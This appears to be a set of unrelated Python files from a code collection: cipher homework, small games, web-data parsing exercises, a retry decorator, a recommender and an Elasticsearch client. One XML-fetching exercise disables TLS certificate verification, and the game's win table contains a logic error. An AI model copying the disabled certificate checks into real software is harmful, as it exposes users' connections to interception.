y_sample = y_sample / args.d2gpo_softmax_temperature
y_sample = softmax(np.expand_dims(y_sample,0)).squeeze(0)
y = np.zeros(len(data))
y[:args.d2gpo_sample_width] = y_sample
print(y[:args.d2gpo_sample_width])
label_weights = np.zeros((len(data), len(data)), dtype=np.float32)
for idx in tqdm.tqdm(range(len(data))):
sort_index = np.array(data[idx])
resort_index = np.zeros(len(data), dtype=np.int)
natural_index = np.arange(len(data))
scatter(resort_index, 0, sort_index, natural_index)
weight = y[resort_index]
label_weights[idx] = weight
f = h5py.File(args.d2gpo_distribution_output,'w')
f.create_dataset('weights', data=label_weights)
f.close()
| true |
164984416f3fd61a9d539f138bd76dc553dcac23 | Python | Bleak-bleak/CSE101 | /trifid.py | UTF-8 | 4,065 | 3.453125 | 3 | [] | no_license | # Your name:Xingtong Zhou
#
# Trifid Cipher (Homework 1-2) starter code
# CSE 101, Fall 2018
import string
# DO NOT MODIFY THIS HELPER FUNCTION!!!
def invert(source):
t = {}
for k in source:
t[source[k]] = k
return t
# COMPLETE THE FUNCTIONS BELOW FOR THIS ASSIGNMENT
def buildEncipheringTable(key):
new_key=key.upper()
new_key=new_key.replace(" ","")
available=list(string.ascii_uppercase)+["!"]
lookup=[1,[],[],[]]
track=1
for i in new_key:
if i in available:
available.remove(i)
lookup[track].append(i)
if len(lookup[track]) == 9:
track += 1
for y in available:
lookup[track].append(y)
if len(lookup[track]) == 9:
track += 1
empt_dic={}
for x in range(1,4):
for z in lookup[x]:
firstDigit= x
letterIndex= lookup[x].index(z)
secondDigit=(letterIndex//3)+1
thirdDigit=(letterIndex%3)+1
empt_dic[z]=firstDigit*100+secondDigit*10+thirdDigit
return empt_dic
def encipher(message, key):
trig = buildEncipheringTable(key)
row_1=""
row_2=""
row_3=""
new_message= message.replace(" ","").upper()
for a in new_message:
letter = str(trig[a])
row_1 = row_1 + letter[0]
row_2 = row_2 + letter[1]
row_3 = row_3 + letter[2]
reverse = invert(trig)
combi = ""
final = ""
b=0
for n in range(len(row_1)):
combi += row_1[b:b+5] + row_2[b:b+5] + row_3[b:b+5]
row_1 = row_1[b+5:]
row_2 = row_2[b+5:]
row_3 = row_3[b+5:]
message=""
left=0
while b < len(combi)/3:
chunks = int(combi[left:left+3])
left += 3
b += 1
message += reverse[chunks]
while len(message)%5 != 0:
message += "X"
add=[]
d=0
for e in range(int(len(message)/5)):
add.append(message[d:d+5])
d += 5
result=" ".join(add)
return result
# DO NOT modify or remove the code below! We will use it for testing.
if __name__ == "__main__":
# Testing Part 1
print('Testing buildEncipheringTable() with key "DRAGON"...')
table1 = buildEncipheringTable("DRAGON")
print('The trigram for "R" is:', table1["R"])
print('The trigram for "I" is:', table1["I"])
print('The trigram for "Z" is:', table1["Z"])
print()
print('Testing buildEncipheringTable() with key "NEPTUNE"...')
table2 = buildEncipheringTable("NEPTUNE")
print('The trigram for "B" is:', table2["B"])
print('The trigram for "J" is:', table2["J"])
print('The trigram for "V" is:', table2["V"])
print()
print('Testing buildEncipheringTable() with key "CHALLENGER"...')
table3 = buildEncipheringTable("CHALLENGER")
print('The trigram for "E" is:', table3["E"])
print('The trigram for "Q" is:', table3["Q"])
print('The trigram for "T" is:', table3["T"])
print()
# Testing Part 2
print('Calling encipher() with message "TOBEORNOTTOBE" and key "HAMLET":', encipher("TOBEORNOTTOBE", "HAMLET"))
print()
print('Calling encipher() with message "SPACETHEFINALFRONTIER" and key "KIRK":', encipher("SPACETHEFINALFRONTIER", "KIRK"))
print()
print('Calling encipher() with message "FOUR SCORE AND SEVEN YEARS AGO" and key "LINCOLN":', encipher("FOUR SCORE AND SEVEN YEARS AGO", "LINCOLN"))
print()
print('Calling encipher() with message "The Helvetii compelled by the want of everything sent ambassadors to him about a surrender" and key "caesar":', encipher("The Helvetii compelled by the want of everything sent ambassadors to him about a surrender", "caesar"))
print()
print('Calling encipher() with message "Alan Turing was a leading participant in the breaking of German ciphers at Bletchley Park" and key "ENIGMA":', encipher("Alan Turing was a leading participant in the breaking of German ciphers at Bletchley Park", "ENIGMA"))
print()
print()
| true |
a14ca55e4a2a2208fd010e3ff30caa0b20e96cba | Python | samdavies1906/Learn2python | /RockPaperScissors.py | UTF-8 | 1,920 | 4.28125 | 4 | [] | no_license | # A rock paper scissors, lizard, spock game using dictionaries dictionaries
import os
import random
# Clear console each run
os.system('cls||clear')
# Dictionary of what moves beat what
winningMoves = {1 : [3,4], #Rock crushes scissors and lizard
2 : [1, 5], #Paper covers rock and disproves spock
3 : [2, 4], #Scissors cuts paper and lizard
4 : [5, 2], #Lizrad poisons spock and eats paper
5 : [2, 5] } #Spock smashes scissors and vaporizes rock
# Move list
# Rock(1), Paper(2), Scissors(3), Lizard(4), Spock(5)
moveListNums = [1,2,3,4,5]
moveListNames = ["rock", "paper", "scissors", "lizard", "spock"]
while True:
try:
bestOf = int(input("Best of how many rounds?: "))
except ValueError:
print("Must enter a number")
continue
else:
break
roundsToWin = (bestOf // 2) + 1
playerScore = 0
computerScore = 0
while playerScore < roundsToWin and computerScore < roundsToWin:
# Player move
while True:
try:
playerMove = int(input("pick Rock(1), Paper(2), Scissors(3), Lizard(4), Spock(5): "))
except ValueError:
print("Must enter a number")
continue
if not playerMove in moveListNums:
print("Must enter a number 1-5")
else:
break
# Computer move
computerMove = random.choice(moveListNums)
print(str(moveListNames[playerMove - 1]) + " VS. " + str(moveListNames[computerMove - 1]))
if computerMove in winningMoves.get(playerMove):
print("You Win!")
playerScore += 1
elif playerMove == computerMove:
print("Its a draw")
else:
print("You lose")
computerScore += 1
print("You: " + str(playerScore) + " Compuer: " + str(computerScore))
if playerScore == roundsToWin:
print("You win!")
else:
print("You Lost, Sadge :(")
| true |
ba8798ae9a8b339a9ad5b6f5eb77ba38e6e52873 | Python | billylu815/test_code | /code3/parsewebdata.py | UTF-8 | 842 | 2.640625 | 3 | [] | no_license | import urllib.request, urllib.parse, urllib.error
import xml.etree.ElementTree as ET
import ssl
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = 'http://py4e-data.dr-chuck.net/comments_1173076.xml'
print('Retrieving', url)
uh = urllib.request.urlopen(url, context=ctx)
data = uh.read()
print('Retrieved', len(data), 'characters')
#print(data.decode())
tree = ET.fromstring(data)
counts = tree.findall('.//count')
acc = 0
for count in counts:
acc += int(count.text)
print('Count: ',len(counts))
print('Sum: ', acc)
#lat = results.find('comments').find('comment').find('count').text
#print('lat', lat)
#http://py4e-data.dr-chuck.net/comment_42.html
'''
print(results.find('commentinfo').find('comments').find('comment').find('count').text)
''' | true |
2c3cb110720082190edcf6ea0e4731757350d805 | Python | oonisim/python-programs | /lib/util_python/function.py | UTF-8 | 2,634 | 3.390625 | 3 | [] | no_license | """Module for Python function utilities"""
from functools import (
wraps
)
import logging
import random
import time
from typing import (
Callable
)
from util_logging import (
get_logger
)
# --------------------------------------------------------------------------------
# Logging
# --------------------------------------------------------------------------------
_logger: logging.Logger = get_logger(__name__)
# --------------------------------------------------------------------------------
# Utility
# --------------------------------------------------------------------------------
def retry_with_exponential_backoff(
proactive_delay: float = 0.0,
initial_delay: float = 1.0,
exponential_base: float = 2.0,
jitter: bool = True,
max_retries: int = 5,
errors: tuple = (Exception,)
) -> Callable:
"""Retry a function with exponential backoff.
See https://pypi.org/project/backoff/ for PyPi module as an alternative.
Usage:
@retry_with_exponential_backoff(args...)
def func_to_retry():
Args:
proactive_delay: delay before calling the function
initial_delay: initial time in seconds to wait before retry
exponential_base:
jitter:
max_retries: number of retries
errors: errors for which attempt the retry
Return a decorator.
"""
def decorator_factory(func: Callable) -> Callable:
@wraps(func)
def decorator(*args, **kwargs):
num_retries: int = 0
delay: float = initial_delay
# Loop until a successful response or max_retries is hit or an exception is raised
while True:
try:
time.sleep(proactive_delay)
return func(*args, **kwargs)
# Retry on specified errors
except errors as error:
msg: str = f"function {func.__name__}() failed due to [{error}] "
# Increment retries
num_retries += 1
# Check if max retries has been reached
if num_retries > max_retries:
msg += f"and maximum number of retries ({max_retries}) exceeded."
_logger.error("%s", msg)
raise RuntimeError(msg) from error
delay *= exponential_base * (1 + jitter * random.random())
msg += f"and retry in {delay} seconds."
_logger.error(msg)
time.sleep(delay)
return decorator
return decorator_factory
| true |
444c692686a5b946293c82214365504f62d99e7f | Python | YimRegister/VGD | /popup_permanent.py | UTF-8 | 402 | 2.625 | 3 | [] | no_license | import pygame
pygame.init()
from vgd import wait_until_quit
screen_width = 800
screen_height = 600
black = (0,0,0)
main_surface = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("Title goes here")
main_surface.fill((255,255,100))
pygame.draw.rect(main_surface, black, (screen_width,screen_height,30,40))
pygame.display.update()
wait_until_quit()
pygame.quit()
| true |
bb1e6feb5ddf0ae8be689f6c482a9d27bf573ca1 | Python | NayantaraPrem/EthereumPricePrediction | /data_collection_tools.py | UTF-8 | 7,338 | 3.03125 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 19 23:46:38 2019
@author: Tara Prem
This module contains helper functions for collecting data for the project
"""
import pytrends.dailydata as dd
import matplotlib.pyplot as plt
from datetime import datetime
import pandas as pd
import requests
from bs4 import BeautifulSoup
from getpass import getpass
import os
import re
import numpy as np
def download_daily_google_trends(keyword, start_year, start_month, end_year, end_month):
"""
Query for and aggregate daily google search trends data for 'keyword' and
download it as a CSV named 'google_trends_{keyword}_{timestamp}.csv'
Args:
keyword: (str) word to search for
start)year: (int) returning trends starting from this year (and month)
start_month: (int) returning trends starting from this (year and) month
end_year: (int) returning trends ending at this year (and month)
end_month: (int) returning trends ending at this (year and) month
Returns:
None
Examples:
download_daily_google_trends(keyword = 'ethereum', start_year=2015, start_month=7, end_year=2019, end_month=11)
"""
#API doc and math explained: https://github.com/GeneralMills/pytrends/blob/master/pytrends/dailydata.py
df_daily = dd.get_daily_data(keyword, start_year, start_month, end_year, end_month)
print(df_daily.tail(31))
# plotting the data per month obtained from Google
plt.plot(df_daily.index, df_daily[f"{keyword}_monthly"])
plt.autoscale(enable=True, axis='x', tight=True)
plt.title(f"Google trends (monthly data): {keyword}")
plt.grid(True)
plt.show()
#plotting the daily data rescaled from the monthly data and the data in a month month 'APIs'
plt.plot(df_daily.index, df_daily[f"{keyword}"])
plt.autoscale(enable=True, axis='x', tight=True)
plt.title(f"Google trends(rescaled to make the daily data comparable): {keyword}")
plt.grid(True)
plt.show()
#download CSV of the dt
timestamp = int(datetime.timestamp(datetime.now()))
filename = f"google_trends_{keyword}_{timestamp}.csv"
df_daily.to_csv(filename)
return
def _parse_bitinfo_graph_record(record):
date = record[11:21]
value = record[24:-1]
return np.array([date,value])
def download_bitinfo_graph_data(url, column_name):
"""
Scrape and aggregate data from the graphs at bitinfocharts.com into
CSV named '{column_name}_{timestamp}.csv'
Args:
url: (str) URL to a graph at bitinfocharts.com
column_name: (str) Name to assign the CSV file and column
Returns:
None
Examples:
download_bitinfo_graph_data(url='https://bitinfocharts.com/comparison/ethereum-tweets.html', column_name='ethereum_tweet_count')
"""
response = requests.get(url)
script_text = BeautifulSoup(response.text,'lxml').findAll('script')[5].text
pattern = re.compile(r'\[new Date\("\d{4}/\d{2}/\d{2}"\),\d*\w*\]')
records = pattern.findall(script_text)
transactions = np.empty((0,2))
for record in records:
transactions = np.vstack((transactions, _parse_bitinfo_graph_record(record)))
df_tweet = pd.DataFrame(transactions[:,1], index=transactions[:,0], columns=[f"{column_name}"])
df_tweet.index = pd.to_datetime(df_tweet.index)
print(df_tweet.tail(3))
#plot the column_name count
plt.plot(df_tweet.index, df_tweet[f"{column_name}"])
plt.yscale('log')
plt.title(f"{column_name}")
plt.grid(True)
#download CSV
timestamp = int(datetime.timestamp(datetime.now()))
filename = f"{column_name}_{timestamp}.csv"
df_tweet.to_csv(filename)
def _format_exchange_data(rows):
df = pd.DataFrame(rows[1:][:], columns = ["address", "name", "balance", "txn_count"]) # discard first empty row
df['balance'] = df['balance'].apply(lambda str: float(str.strip(" Ether").replace(",", "")))
df['txn_count'] = df['txn_count'].apply(lambda str: float(str.replace(",", "")))
return df
def scrape_exchanges():
"""
Scrapes etherscan for all the data on all the exchange addresses
Return:
(pd.DataFrame) DF with columns "address", "name", "balance", "txn count"
"""
page_number = 1
page_limit=100
exchanges = []
while True:
url = f"https://etherscan.io/accounts/label/exchange/{page_number}?ps={page_limit}"
print(f"Requesting {url}")
agent = {"User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0'}
page = requests.get(url, headers=agent).text
table = BeautifulSoup(page, 'html.parser').find('table')
rows = [[item.text.strip() for item in row.find_all('td')] for row in table.find_all('tr')]
if (len(rows) <= 2):
# no more data
break
exchanges.append(_format_exchange_data(rows))
page_number+=1
exchanges = pd.concat(exchanges)
print(exchanges.head())
print(exchanges.count())
print(exchanges.describe())
return exchanges
def filter_top_exchange_addresses(exhanges_df, min_balance = 2000, min_txn_count = 400000):
"""
Filter exchanges with balance > min_balance and transaction count > min_txn_count
Args:
exchanges_df: (pd.Dataframe) Exchanges with atleast columns 'balance'(float), 'txn_count'(float) and 'address' (str)
min_balance: (int) filter exchanges by balance > min_balance AND
min_txn_count: (int) filter exchanges by txn count > min_txn_count
Return:
(pd.Dataframe) of addresses
Examples:
df = scrape_exchanges()
filter_top_exchange_addresses(df)
"""
balance_condition = exhanges_df['balance'] > min_balance
txn_condition = exhanges_df['txn_count'] > min_txn_count
return exhanges_df[balance_condition & txn_condition]['address']
def get_txn_history(addresses, api_key = None, offset = 5000):
"""
Returns all the historical transactions made to/from the input address.
NOTE: there is a rate limit of 5 requests/sec for EtherScan.
Args:
addresses: (pd.DataFrame) addresses to return txns for
api_key: (str) EtherScan.io API key. If None, will be prompted to enter one.
Return:
(dictionary of pd.DataFrame) DataFrames of transactions keyed by address of the transactions
Examples:
df = scrape_exchanges()
df = filter_top_exchange_addresses(df)
get_txn_history(df)
"""
if (api_key is None):
api_key = getpass('Enter EtherScan.io API Key: ')
txns_by_address = {}
for address in addresses:
page = 1
txns = []
while (page*offset <= 10000): # etherscan.io only maintains the last 10,000 txns
api = f"https://api.etherscan.io/api?module=account&action=txlist&address={address}&page={page}&offset={offset}&sort=asc&apikey={api_key}"
response = requests.get(api)
if (response.json()['status'] != '1'):
print(f"Failed API call: {response.json()['result']}; {response.json()['message']}")
break
print(f"page {page} @ {address}")
txns.append(pd.DataFrame(response.json()['result']))
page += 1
txns_by_address[address] = pd.concat(txns)
return txns_by_address
| true |
68295bab3f9be6a82669c77ecaea4b4e32e81662 | Python | manlan2/xndian | /deploy/api/printer_api.py | UTF-8 | 5,094 | 2.84375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import urllib2
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append("..")
# 说明:
# 1.把注释的方法打开,即可测试
# 2.PRINTER_SN打印机编号9位,查看飞鹅打印机底部贴纸上面的打印机编号
# 3.KEY,去飞鹅打印机官方网站 www.feieyun.com 注册帐号,添加打印机编号,自动生成KEY
def print_order(order_content, order_time):
import common
params = {
'sn': common.PRINTER_SN,
'key': common.KEY,
'printContent': order_content,
'times': str(order_time)
}
encodedata = urllib.urlencode(params)
strurl = common.IP + common.HOSTNAME + "/printOrderAction"
req = urllib2.Request(url=strurl, data=encodedata)
res = urllib2.urlopen(req).read().decode('utf-8')
return res
# ====================方法一:打印订单=======================
# ***服务器返回值有如下几种***
# {"responseCode":0,"msg":"服务器接收订单成功","orderindex":"xxxxxxxxxxxxxxxxxx"}
# {"responseCode":1,"msg":"打印机编号错误"};
# {"responseCode":2,"msg":"服务器处理订单失败"};
# {"responseCode":3,"msg":"打印内容太长"};
# {"responseCode":4,"msg":"请求参数错误"};
#
# 标签说明:"<BR>"为换行符,"<CB></CB>"为居中放大,"<B></B>"为放大,"<C></C>"为居中,"<L></L>"为字体变高,"<QR></QR>"为二维码
# 参数说明sn:打印机编号;key:打印密钥;printContent:(打印)订单内容;times:打印联(次)数
# 方法开始
# content = "<CB>测试打印</CB><BR>"
# content += "名称 单价 数量 金额<BR>"
# content += "--------------------------------<BR>"
# content += "饭 1.0 1 1.0<BR>"
# content += "炒饭 10.0 10 10.0<BR>"
# content += "蛋炒饭 10.0 10 100.0<BR>"
# content += "鸡蛋炒饭 100.0 1 100.0<BR>"
# content += "番茄蛋炒饭 1000.0 1 100.0<BR>"
# content += "西红柿蛋炒饭 1000.0 1 100.0<BR>"
# content += "西红柿鸡蛋炒饭 100.0 10 100.0<BR>"
# content += "<QR>http://www.dzist.com</QR>"
#
# params = {
# 'sn':PRINTER_SN,
# 'key':KEY,
# 'printContent':content,
# 'times':'1'
# }
# encodedata = urllib.urlencode(params)
# strurl = IP+HOSTNAME+"/printOrderAction"
# req = urllib2.Request(url = strurl,data =encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束 =================================================
# ===============方法二:查询某订单是否打印成功===============
# ***服务器返回的状态有如下几种***
# {"responseCode":0,"msg":"已打印"};
# {"responseCode":0,"msg":"未打印"};
# {"responseCode":1,"msg":"请求参数错误"};
# {"responseCode":2,"msg":"没有找到该索引的订单"};
#
# 参数说明sn:打印机编号;key:打印密钥;index:订单索引,从方法1返回值中获取
# 方法开始
# params = {
# 'sn':PRINTER_SN,
# 'key':KEY,
# 'index':"1425701882784926118661",
# }
# encodedata = urllib.urlencode(params)
# strurl = IP+HOSTNAME+"/queryOrderStateAction"
# req = urllib2.Request(url = strurl,data =encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束=================================================
# =================方法三:查询指定打印机某天的订单详情=============
# ***服务器返回的状态有如下几种(print:已打印,waiting:未打印)***
# {"responseCode":0,"print":"xx","waiting":"xx"};
# {"responseCode":1,"msg":"请求参数错误"};
#
# 参数说明sn:打印机编号;key:打印密钥;date:日期,注意时间格式为"2015-01-01"
# 方法开始
# params = {
# 'sn':PRINTER_SN,
# 'key':KEY,
# 'date':"2015-01-31",
# }
# encodedata = urllib.urlencode(params)
# strurl = IP+HOSTNAME+"/queryOrderInfoAction"
# req = urllib2.Request(url = strurl,data =encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束=================================================
# ==================方法四:查询打印机的状态====================
# ***服务器返回的状态有如下几种(print:已打印,waiting:未打印)***
# {"responseCode":0,"msg":"离线"};
# {"responseCode":0,"msg":"在线,纸张正常"};
# {"responseCode":0,"msg":"在线,缺纸"};
# {"responseCode":1,"msg":"请求参数错误"};
#
# 参数说明sn:打印机编号;key:打印密钥;
# 方法开始
# params = {
# 'sn': common.PRINTER_SN,
# 'key': common.KEY,
# }
# encodedata = urllib.urlencode(params)
# strurl = common.IP + common.HOSTNAME + "/queryPrinterStatusAction"
# req = urllib2.Request(url=strurl, data=encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束=================================================
| true |
ac46a0aac127f1a293c8336c8a025a0174fc9c6e | Python | charmguitar/djangoapp | /scalendar/views.py | UTF-8 | 6,557 | 3.375 | 3 | [] | no_license | import calendar
from collections import deque
import datetime
from .models import Schedule
#ここで、カレンダーについて定義
class BaseCalendarMixin:
#カレンダー関連の、基底クラス
first_weekday = 0 # 0は月曜から、1は火曜から。6なら日曜日からになります。お望みなら、継承したビューで指定してください。
week_names = ['月', '火', '水', '木', '金', '土', '日'] # これは、月曜日から書くことを想定します。
def setup(self):
#コンストラクタ.カレンダーの基底クラスのインスタンス作成時に何曜日から始まるかを決めて,importしたcalendarを利用し、インスタンスを生成
self._calendar = calendar.Calendar(self.first_weekday)
def get_week_names(self):
#first_weekday(最初に表示される曜日)にあわせて、week_namesをシフトする
#week_namesをキューの順に格納し、指定の回数分ローテーションすることで、最初の曜日が決まる。
week_names = deque(self.week_names)
week_names.rotate(-self.first_weekday)
return week_names
#以降、importしたdatetimeを利用し、年月日を取得している.
class MonthCalendarMixin(BaseCalendarMixin):
#月間カレンダー
@staticmethod
def get_previous_month(date):
#前月を返す.1月だけ年が変わるので分岐
if date.month == 1:
return date.replace(year=date.year-1, month=12, day=1)
else:
return date.replace(month=date.month-1, day=1)
@staticmethod
def get_next_month(date):
#次月を返す.12月だけ年が変わるので分岐
if date.month == 12:
return date.replace(year=date.year+1, month=1, day=1)
else:
return date.replace(month=date.month+1, day=1)
def get_month_days(self, date):
#その月の全ての日を返す
return self._calendar.monthdatescalendar(date.year, date.month)
def get_current_month(self):
#現在の月(ただし、urlで指定された月を示すので、今月とは限らない.)を返す
month = self.kwargs.get('month') #self.kwargsはurlのプロパティ(id?)から取得している.
year = self.kwargs.get('year')
if month and year:
month = datetime.date(year=int(year), month=int(month), day=1)
else:
month = datetime.date.today().replace(day=1)
return month
def get_month_calendar(self):
#月間カレンダー情報の入った辞書を返す
self.setup()
current_month = self.get_current_month()
calendar_data = {
'now': datetime.date.today(),
'days': self.get_month_days(current_month),
'current': current_month,
'previous': self.get_previous_month(current_month),
'next': self.get_next_month(current_month),
'week_names': self.get_week_names(),
}
return calendar_data
class WeekCalendarMixin(BaseCalendarMixin):
#週間カレンダーの機能を提供するMixin
def get_week_days(self):
#その週の日を全て返す
month = self.kwargs.get('month')
year = self.kwargs.get('year')
day = self.kwargs.get('day')
if month and year and day:
date = datetime.date(year=int(year), month=int(month), day=int(day))
else:
date = datetime.date.today().replace(day=1)
for week in self._calendar.monthdatescalendar(date.year, date.month):
if date in week:
return week
def get_week_calendar(self):
#週間カレンダー情報の入った辞書を返す
self.setup()
days = self.get_week_days()
first = days[0]
last = days[-1]
calendar_data = {
'now': datetime.date.today(),
'days': days,
'previous': first - datetime.timedelta(days=7),
'next': first + datetime.timedelta(days=7),
'week_names': self.get_week_names(),
'first': first,
'last': last,
}
return calendar_data
class WeekWithScheduleMixin(WeekCalendarMixin):
#スケジュール付きの、週間カレンダーを提供するMixin
model = Schedule
date_field = 'date'
order_field = 'start_time'
def get_week_schedules(self, days):
llist = list(range(7))
for day in days:
lookup = {self.date_field: day}
queryset = self.model.objects.filter(**lookup)
if self.order_field:
llist.append(queryset.order_by(self.order_field))
return llist
#それぞれの日のスケジュールを返す.それぞれの日付の予定をyeildによって個別に渡している.
"""
for day in days:
lookup = {self.date_field: day}
queryset = self.model.objects.filter(**lookup)
if self.order_field:
queryset = queryset.order_by(self.order_field)
yield queryset
"""
def get_week_calendar(self):
calendar_data = super().get_week_calendar()
schedules = self.get_week_schedules(calendar_data['days'])
calendar_data['schedule_list'] = schedules
return calendar_data
#以降は使っていないクラス.
"""
class MonthWithScheduleMixin(MonthCalendarMixin):
#スケジュール付きの、月間カレンダーを提供するMixin
model = Schedule
date_field = 'date'
order_field = 'start_time'
def get_month_schedules(self, days):
#(日付, その日のスケジュール)なリストを返す
day_with_schedules = []
for week in days:
week_list = []
for day in week:
lookup = {self.date_field: day}
queryset = self.model.objects.filter(**lookup)
if self.order_field:
queryset = queryset.order_by(self.order_field)
week_list.append(
(day, queryset)
)
day_with_schedules.append(week_list)
return day_with_schedules
def get_month_calendar(self):
calendar_data = super().get_month_calendar()
day_with_schedules = self.get_month_schedules(calendar_data['days'])
calendar_data['days'] = day_with_schedules
return calendar_data
"""
| true |
32234486b9190af85d7f2e1f41e6f92ee87c414f | Python | nathanbreitsch/Columns-And-Buckets | /data/parser.py | UTF-8 | 2,692 | 2.875 | 3 | [] | no_license | import json
def make_csv():
file = open("transcript.txt","r")
text = file.read()
file.close()
#get rid of double newlines
#while "\n\n" in text:
# text = text.replace("\n\n", "\n")
text = text.replace("\n", ' ')
#remove all commas
for undesirable in [',','.',';','?', '-']:
while undesirable in text:
text = text.replace(undesirable, " ")
#replace colons with commas
#text = text.replace(":",",")
#replace all prompts
for prompt in [
"BUSH",
"TAPPER",
"PAUL",
"HUCKABEE",
"RUBIO",
"TRUMP",
"CRUZ",
"CARSON",
"WALKER",
"FIORINA",
"KASICH",
"CHRISTIE"
]:
text = text.replace(prompt + ':', '\n' + prompt + ',')
file = open("better.csv", "w")
file.write(text)
file.close()
def make_json():
file = open("better.csv", "r")
out_records = []
index = 0
for line in file.readlines():
(name, passage) = line.split(',')
out_records.append({
'name': name,
'passage': passage,
'index': index
})
index += 1
file.close()
file = open("debate.json", "w")
file.write(json.dumps(out_records))
file.close()
def make_json_whitelist(whitelist, filename):
whitelist = map(lambda x: x.upper().strip(), whitelist)
file = open("better.csv", "r")
out_records = []
index = 0
for line in file.readlines():
(name, passage) = line.split(',')
passage_words = passage.split(' ')
passage_words = map(lambda x: x.upper().strip(), passage_words)
passage_words = filter(lambda x: x in whitelist, passage_words)
print(passage_words)
passage = " ".join(passage_words)
out_records.append({
'name': name,
'passage': passage,
'index': index
})
index += 1
file.close()
file = open(filename, "w")
file.write(json.dumps(out_records))
file.close()
if __name__ == '__main__':
#make_csv()
#make_json()
#whitelist = ["Iraq", "Change", "Economy", "Business", "Change", "jobs", "reform", 'god', 'character', 'disgusting', 'obama', 'obamacare', 'healthcare', 'family', 'tax', 'liberal', 'conservative', 'war', 'syria','china', 'oil']
#make_json_whitelist(whitelist, "debate-whitelist.json")
whitelist = [
"BUSH",
"TAPPER",
"PAUL",
"HUCKABEE",
"RUBIO",
"TRUMP",
"CRUZ",
"CARSON",
"WALKER",
"FIORINA",
"KASICH",
"CHRISTIE"
]
make_json_whitelist(whitelist, "debate-gossip.json")
| true |
ee33627ed678769e59fd85db4de7aedb06d3e06b | Python | renataeva/python-basics | /lists/moving.py | UTF-8 | 147 | 3.21875 | 3 | [
"Apache-2.0"
] | permissive | def move(seq):
seq = [*seq[2:], *seq[0:2]]
return seq
numbers = [1, 2, 3, 4, 5]
r = move(numbers)
print(r)
assert r == [3, 4, 5, 1, 2]
| true |
3318356046423595707edeb292f2f9fe6623ee27 | Python | Riksi/Emov | /movies/cofi.py | UTF-8 | 3,396 | 2.65625 | 3 | [] | no_license | import numpy as np
class Cofi:
def __init__(self,
Y,
R,
num_features,
num_recms = 10,
lmd = 10,
alpha=0.001,
num_iters = 500,
user = None,
debug = False,
normalize = True,
debugGD = False):
self.num_features = num_features
self.Y = Y
self.R = R
self.num_movies,self.num_users = self.Y.shape
self.Y_mean = np.zeros((self.num_movies,1))
if debug:
self.X = np.loadtxt('x_test.txt')
self.T = np.loadtxt('t_test.txt')
else:
self.X = np.random.randn(self.num_movies,self.num_features)
self.T = np.random.randn(self.num_users,self.num_features)
self.lmd = lmd
self.alpha = alpha
self.num_recms = num_recms
self.num_iters = num_iters
self.normalize = normalize
self.debugGD = debugGD
self.user = user or self.num_users
def compute_cost(self,params):
X,T= self.reshape_params(params)
J = 0.5*self.sum2(self.cost_term(X,T,2))\
+0.5*self.lmd*(self.sum2(T**2)
+self.sum2(X**2))
return J
def sum2(self,M):
return np.sum(np.sum(M))
def cost_term(self,X,T,power=1):
return ((X.dot(T.T) - self.Y)**power)*self.R
def cost_grad(self,params):
X,T = self.reshape_params(params)
grad_term = self.cost_term(X,T)
grad_X = grad_term.dot(T) + self.lmd*X
grad_T = (grad_term.T).dot(X) + self.lmd*T
return self.unroll_params(grad_X,grad_T)
def reshape_params(self,params):
m,u,f = self.num_movies,self.num_users,self.num_features
x = params[0:m*f].reshape((m,f),order='F');
t = params[m*f:].reshape((u,f),order='F');
return x,t
def unroll_params(self,x,t):
return np.concatenate((x.flatten(order='F'),t.flatten(order='F')),axis=0)
def mean_normalize(self):
for i in range(0,self.num_movies):
idx = np.where(self.R[i,:]==1)
self.Y_mean[i,:] = np.mean(self.Y[i,idx])
self.Y[i,idx]-=self.Y_mean[i,:]
def grad_desc(self,params):
for i in range(0,self.num_iters):
if self.debugGD:
print('Iteration: %s, Cost: %s'%(str(i),str(self.compute_cost(params))))
params = params - self.alpha*self.cost_grad(params)
return params
def calculate_params(self):
if self.normalize:
self.mean_normalize()
params = self.grad_desc(self.unroll_params(self.X,self.T))
self.X,self.T = self.reshape_params(params)
def predict(self):
self.predictions = self.X.dot(self.T.T) + self.Y_mean
def recommend(self):
self.calculate_params()
self.predict()
real_preds = self.predictions[:,self.user-1:self.user]*(self.R[:,self.user-1:self.user]!=1)
movie_inds = [i for i in range(0,self.num_movies)]
movie_inds.sort(key = lambda ind: real_preds[ind,:], reverse = True)
movie_ids = list(map(lambda ind:ind+1,movie_inds))
self.preds = real_preds
return movie_ids[:self.num_recms]
| true |
d2770ed3fc138a972f754dfb32fab49d52f4e193 | Python | Aasthaengg/IBMdataset | /Python_codes/p03761/s091827333.py | UTF-8 | 131 | 3 | 3 | [] | no_license | n = int(input())
S = [input() for _ in range(n)]
for c in map(chr, range(97+123)):
print(c*min(s.count(c) for s in S), end='')
| true |
44eaf107d0a29ac9791045ce3f62bb52789fc6f3 | Python | harshit98/Retail-Updates-Streamer | /es_request_handler.py | UTF-8 | 1,237 | 2.90625 | 3 | [
"Apache-2.0"
] | permissive | import asyncio
import time
from datastore.main import ElasticsearchRequestHandler
es = ElasticsearchRequestHandler()
async def main():
# get single document
product_id = 10
print(f"product having id {product_id}: {await es.get(product_id)}")
# get multiple documents having stock greater than 0
query = {
"query": {
"bool": {
"must": {
"range": {
"product.stock": {
"gt": 6
}
}
}
}
}
}
print(f"products having stock > 6 :: {await es.search(query)}")
# update price of product with id = 200
resp = await es.get(product_id)
product = resp.get('_source').get('product')
print(f"product price before update {product['price']}")
product['price'] = 8.5
print(f"product price after update {product['price']}")
update = await es.update(product, product_id)
if update:
print(f"product updated successfully")
else:
print(f"product update failed")
# close ES connection
await es.close_connection()
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| true |
